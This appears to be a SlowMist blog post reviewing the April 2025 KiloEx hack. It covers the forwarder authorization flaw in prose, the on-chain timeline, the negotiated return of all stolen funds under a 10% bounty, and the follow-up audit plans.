On April 15, 2025, the decentralized perpetual contract trading platform KiloEx suffered a hacker attack, resulting in a loss of approximately $8.44 million. After the incident, SlowMist immediately intervened to analyze the situation and issued a security alert. Fortunately, with the project team's proactive response and collaboration with SlowMist and others, all stolen assets were successfully recovered after 3.5 days, and the incident was resolved satisfactorily.
(https://x.com/SlowMist_Team/status/1911991384254402737)
Incident Review
Vulnerability Cause Analysis
According to KiloEx's analysis report, this attack originated from a flaw in the contract authorization verification mechanism. The TrustedForwarder contract inherited OpenZeppelin's MinimalForwarderUpgradeable contract, and the execute method was not overridden in TrustedForwarder, making it an accessible method without authorization.
The attacker exploited this vulnerability to directly call OpenZeppelin's MinimalForwarderUpgradeable original execute method. The request content of the execute method is to call the delegateExecutePositions function, in which only msg.sender == trustedForwarder was validated, and did not verify whether the true initiator was the keeper, thus allowing the attacker to bypass authorization verification. The attacker opened a position at an extremely low price in one transaction and then closed it at a higher price, thus completing the attack.
Attack Timeline
The on-chain traces of this attack are clear, with key time nodes as follows:
Apr-13-2025 23:31:59 UTC
The hacker address 0x00faC92881556A90FdB19eAe9F23640B95B4bcBd withdrew 1 ETH from Tornado Cash as startup funds.
(https://etherscan.io/tx/0xa0fa4ab8ded0c07085d244e1981919b440f78b609e1cf8d7f8ee32d358dfdf46)
Apr-13-2025 23:39:11 ~ Apr-14-2025 01:21:36 UTC
The hacker used multiple DeFi Protocols and Bridges to split and transfer the ETH withdrawn from Tornado Cash to opBNB, Base, BSC, Taiko, B2, and Manta chains as gas fees for subsequent deployment of attack contracts.
(https://dashboard.misttrack.io/address/ETH/0x00faC92881556A90FdB19eAe9F23640B95B4bcBd)
Apr-14-2025 18:27:43 ~ 19:36:49 UTC
The hacker deployed attack contracts on opBNB, Base, BSC, Taiko, B2, and Manta chains.
(https://opbnbscan.com/tx/0x657ab20a838043e36ab372a122804e07dbeca522b989899e27dee54b4c3f2971)
Apr-14-2025 18:52:27 ~ 19:40:49 UTC
The hacker initiated attacks by calling the attack contract on opBNB, Base, BSC, Taiko, B2, and Manta chains.
(https://opbnbscan.com/tx/0x79eb28ae21698733048e2dae9f9fe3d913396dc9d93a0e30d659df6065127964)
Emergency Response
After the incident occurred, relying on SlowMist's emergency response service, SlowMist immediately organized an emergency security team to work with KiloEx to outline the attack path and fund flow, utilizing their self-developed on-chain anti-money laundering tracking and analysis platform MistTrack (https://misttrack.io/) and the InMist threat intelligence network to extract attacker information and characteristics.
At the same time, SlowMist played a key role in assisting KiloEx to conduct a comprehensive on-chain review of the attack incident, clarify the principles of the vulnerability, and assist KiloEx in multiple rounds of negotiations with the attacker to promote a fund return plan.
(https://etherscan.io/idm?addresses=0x00fac92881556a90fdb19eae9f23640b95b4bcbd%2C0x1D568fc08a1d3978985bc3e896A22abD1222ABcF%2C&type=1)
With the collaboration of SlowMist and various parties, KiloEx ultimately reached a 10% white-hat bounty agreement with the hacker. The hacker subsequently returned all stolen assets to KiloEx's official Safe multi-signature wallet, involving the following addresses:
opBNB: 0xb1a95732ed3c75f7b1dc594a357f7a957e9baad2
BNB, Base, ETH, Arbitrum: 0xd38a22f5330f45162f13086d6ccbde0335c1ae9e
Manta: 0x0f9c71f888c1d263eab34d6d9360a3a45855365d
The returned currencies included not only the original USDT and USDC, but also assets such as ETH, BNB, WBTC, and DAI that the hacker converted during the attack.
(https://t[.]me/misttrack_alert)
The KiloEx team specially thanked SlowMist for their assistance in this incident.
(https://x.com/KiloEx_perp/status/1913168299292328115)
Binance founder CZ also promptly retweeted related posts, stating: 'I am glad to see the industry and the @BNBChain ecosystem collaborating closely.'
(https://x.com/cz_binance/status/1913234751319859231)
Security Reinforcement
After the incident, KiloEx also sought SlowMist to initiate a security audit. SlowMist formulated two audit plans for KiloEx: the first is to complete a comprehensive security audit lasting about 45 days before the platform goes back online to ensure every aspect is secure; the second is to prioritize a comprehensive check on protocol permissions to prevent similar attacks from happening again. KiloEx will arrange to go back online based on the preliminary results of the permissions audit. After fixing permission issues, SlowMist will conduct an in-depth audit of KiloEx's overall logic and economic model, expected to be shorter than 45 days. Ultimately, KiloEx took community feedback and launch timing into consideration and chose the second plan, prioritizing “permissions audit first, then comprehensive audit.”
(https://x.com/KiloEx_perp/status/1913542713825480863)
Summary
From the rapid response to the security incident, to the full recovery of funds, and subsequent audits and protective upgrades, the joint emergency response of KiloEx and SlowMist fully demonstrates the importance of collaboration between security teams and project parties. This incident also reminds all Web3 projects that security should not stop at pre-launch audits; monitoring during the event and post-incident emergency responses are equally important.
Security is never just a patch after going live; it is an essential core aspect throughout the entire life cycle of a Web3 project. SlowMist will continue to collaborate with more projects to build a security closed loop that includes preemptive protection, real-time monitoring, and post-incident emergency response, jointly safeguarding user asset security and promoting healthy industry development.
Finally, for a more detailed analysis of the KiloEx security incident, please refer to KiloEx's official incident analysis report: https://medium.com/@KiloEx/kiloex-security-incident-root-cause-analysis-post-mortem-3d899caac08c.